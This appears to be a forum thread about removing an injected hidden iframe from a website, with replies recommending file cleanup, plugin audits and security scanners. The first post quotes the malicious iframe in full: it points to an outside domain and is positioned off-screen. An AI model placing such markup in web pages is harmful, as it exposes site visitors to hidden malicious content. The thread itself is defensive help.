Greetings,

After working on my website for a long time, I noticed the presence of the following links:

<iframe src="http://ppstpfh.mrslsove.com/3c7.2ltJm2evPCAk?default" name="Lendomen" height="103" width="103" style="left:-500px;top:0px;position:fixed;"></iframe>
Although I cannot locate these links in the source code, they are visible through developer tools. I am unsure how to remove them and would appreciate any assistance from those who have faced a similar problem.

Do these appear in all JavaScript files? If so, they need to be removed separately, making sure to delete everything because otherwise they will be restored. I was able to delete it by using a "text replacer" program in a backup of the site and uploading it again. You could try this method.

Remove all modules, plugins, components, etc. that were installed prior to the virus's appearance, as it can be loaded from there. Then proceed to delete the code again. By the way, I had to delete it in parts as it kept changing constantly.

It is recommended to ask the hosting provider to check your website, as they have powerful means of protection against security issues.

Using free templates is not safe, and it is recommended to treat them with caution. It is better to create a template using a program like Artisteer to ensure it contains no malicious code.

The WP Theme Authenticity Checker (TAC) plugin can be used to check templates for third-party links. If the green square and "Theme OK" appear, there is nothing to worry about. However, if the template contains a link to the developer's website, it can be removed from the theme code.

The AntiVirus for WordPress plugin can also be used to scan templates for third-party code. It is possible to enable daily scanning and receive alerts via email.

The Exploit Scanner Plugin is a powerful tool but should be used by advanced users as it is highly suspicious and may flag legitimate code as malicious. When encountering a problem, comparing the code with a clean WP installation may help identify malicious code.

The iframe is loading content from a suspicious domain (ppstpfh.mrslsove.com), which is likely a malicious actor. The style attribute is set to position the iframe off-screen, making it invisible to the naked eye, but still allowing it to load and potentially execute malicious scripts.

Now, the fact that you can't find this code in your source code suggests that it's being injected dynamically, possibly through a vulnerability in your website's code or a third-party script. Here are a few potential culprits:

Malware or viruses on your local machine or server, which could be injecting the code into your website.
A compromised plugin or module in your Content Management System (CMS) or framework.
A vulnerability in your website's code, such as an outdated library or a SQL injection vulnerability.
A malicious script injected by a third-party service, such as an ad network or analytics provider.

To tackle this issue, I recommend the following steps:

Scan your website and server for malware: Run a thorough scan using a reputable security tool, such as Malwarebytes or Wordfence, to detect and remove any malware or viruses.
Audit your plugins and modules: Review your CMS or framework's plugins and modules, and update or remove any outdated or suspicious ones.
Review your website's code: Conduct a thorough code review to identify any potential vulnerabilities, such as outdated libraries or SQL injection vulnerabilities.
Check your third-party services: Review your website's integrations with third-party services, such as ad networks or analytics providers, and ensure they're not injecting malicious scripts.
Implement security measures: Consider implementing security measures, such as a Web Application Firewall (WAF) or a Content Security Policy (CSP), to prevent similar issues in the future.